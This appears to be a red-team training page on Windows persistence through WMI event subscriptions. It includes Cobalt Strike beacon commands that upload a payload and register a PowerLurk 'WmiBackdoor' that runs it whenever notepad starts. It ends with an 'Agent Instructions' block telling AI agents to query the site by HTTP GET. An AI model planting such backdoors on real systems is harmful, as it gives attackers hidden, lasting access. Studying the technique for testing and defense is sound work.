# WMI Event Subscriptions Persistence via WMI events can be achieved by leveraging the following three classes: * EventConsumer * EventFilter * FilterToConsumerBinding \\ An EventConsumer is the action that we want to perform - in this case, to execute a payload. This can be via OS commands (such as a PowerShell one-liner) or VBScript. An EventFilter is a trigger that we can act upon. Any arbitrary WMI query can be used as a filter which provides practically unlimited options. These can include when a particular process starts, when a user logs in, when a USB device is inserted, any specific time of day or on a timed interval. The FilterToConsumerBinding simply links an EventConsumer and EventFilter together. \\ [PowerLurk](https://github.com/Sw4mpf0x/PowerLurk) is a PowerShell tool for building these WMI events. In this example, I will upload a DNS payload into the Windows directory, import PowerLurk.ps1 and create a new WMI event subscription that will execute it whenever notepad is started. ``` beacon> cd C:\Windows beacon> upload C:\Payloads\dns_x64.exe beacon> powershell-import C:\Tools\PowerLurk.ps1 beacon> powershell Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe ``` \\ You can view these classes afterwards using `Get-WmiEvent -Name WmiBackdoor`. The *CommandLineTemplate* for the EventConsumer will simply be `C:\Windows\dns_x64.exe`; and query for the EventFilter will be `SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'`. Open notepad on Workstation 2 and the DNS Beacon will appear. \\ ![](https://files.cdn.thinkific.com/file_uploads/584845/images/523/658/5e8/wmi-sub.png) \\ The backdoor can be removed with `Get-WmiEvent -Name WmiBackdoor | Remove-WmiObject`. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://yamortsa.gitbook.io/rto/elevated-host-persistence/wmi-event-subscriptions.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.